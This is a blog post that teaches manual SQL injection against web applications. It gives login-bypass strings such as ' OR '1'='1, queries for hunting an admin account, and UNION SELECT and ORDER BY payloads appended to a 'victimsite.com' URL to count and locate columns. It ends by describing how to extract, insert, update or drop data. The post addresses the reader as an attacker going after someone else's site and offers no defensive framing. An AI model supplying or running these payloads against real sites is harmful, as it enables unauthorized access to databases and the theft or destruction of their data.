As per today it is hard to find SQL injection vulnerability in web applications but if you find then here are some basic methods to exploit them. SQL injection vulnerability can be exploited using login forms, search boxes, product pages and URLs. Login forms, search boxes can checked for vulnerability by typing string of following pattern,
‘ a ’ = ‘ a ’
‘ c ’ = ‘ b ’
or just
‘ ’ = ‘ ’
If the application returns with some error related to SQL syntax then it's most likely can be exploited. The very first step would be bypassing login, to bypass login try strings of following patterns in both username and password field,
’ OR ‘ 1 ’ = ‘ 1
’ OR ‘ a ’ = ‘ a
password:' or 1=1—
something’ OR ‘ 1 ’ = ‘ 1 ’
something’ OR ‘ a ’ = ‘ a ’
login:’ OR ‘ a ’ = ‘ a ’
If the web application is vulnerable you are most likely to get login with very first user’s entry available in database. Most of the times the first user is admin of database and thus you can get control over complete database. If first user is not admin of database you can search for it. For example if first user entries belong to user Max, Adrain, James, Will and none of them is admin then you have to try queries in following way,
’ OR ‘ 1 ’ = ‘ 1 ’ and firstname <> Max and firstname <> Adrian and firstname <> James
’ OR ‘ 1 ’ = ‘ 1 ’ and uname <> Max and uname <> Adrian and uname <> James
’ OR ‘ 1 ’ = ‘ 1 ’ and username <> Max and username <> Adrian and username <> James
’ OR ‘ 1 ’ = ‘ 1 ’ and fname <> Max and fname <> Adrian and fname <> James
Where you have to replace firstname, uname, username and fname with name of username field. Sometime it’s not at all compulsory to check for admin username because sometimes database admin forgets to change permission of other users thus allowing every user full access to database.
Once you are in your next step would be checking for number of columns. For that you have to first find URL of type,
www.victimsite.com/page.asp?id=12
or in simple a URL which matches following pattern at end
id=num
Where num can be any number or string. Now to check vulnerability append the number with single apostrophe,
www.victimsite.com/page.asp?id=12’
And if it returns with error then surely it is vulnerable for further exploit. Append the vulnerable URL with following queries,
’ UNION SELECT NULL—
’ UNION SELECT NULL, NULL—
’ UNION SELECT NULL, NULL, NULL—
Final URL will appear as follows,
www.victimsite.com/page.asp?id=12’ UNION SELECT NULL—
www.victimsite.com/page.asp?id=12’ UNION SELECT NULL, NULL—
www.victimsite.com/page.asp?id=12’ UNION SELECT NULL, NULL, NULL—
Increase number of NULL until you get successful query execution. Another way to find number of columns is to check by order query,
www.victimsite.com/page.asp?id=12’ ORDER BY 1
www.victimsite.com/page.asp?id=12’ ORDER BY 2
www.victimsite.com/page.asp?id=12’ ORDER BY 3
www.victimsite.com/page.asp?id=12’ ORDER BY 4
all queries are most likely to return same result. The number of columns are confirmed when you get an error message. Your next step would be to find which column accepts string data type, for example consider the database have four column, to find string data type column append URL by,
’UNION SELECT ‘ a ’ , NULL, NULL, NULL--
’UNION SELECT NULL, ‘ a ’, NULL, NULL--
’UNION SELECT NULL, NULL, ‘ a ’, NULL--
’UNION SELECT NULL, NULL, NULL, ‘ a ’--
The query which will return a special column with ‘ a ’ in it will determine column for extracting further data.
Once all above stuffs are done you can extract, delete or insert data using SELECT, INSERT, UPDATE, DELETE and DROP queries by union it with exploit URL.
All steps we discussed so far are discussed with respect to MYSQL, syntax may vary a little with respect to any other database so it’s better to grab name and version of database using banner grabbing before performing an attack.
You can create several variations of same queries to perform SQL injection attacks. There are free and automated tools which can perform SQL injection attacks. As you can see performing a manual SQL injection is real tedious deal so in our next post first of all we will discus how to find soft targets for SQL injections and then exploit them using SQL injection tools.
No comments:
Post a Comment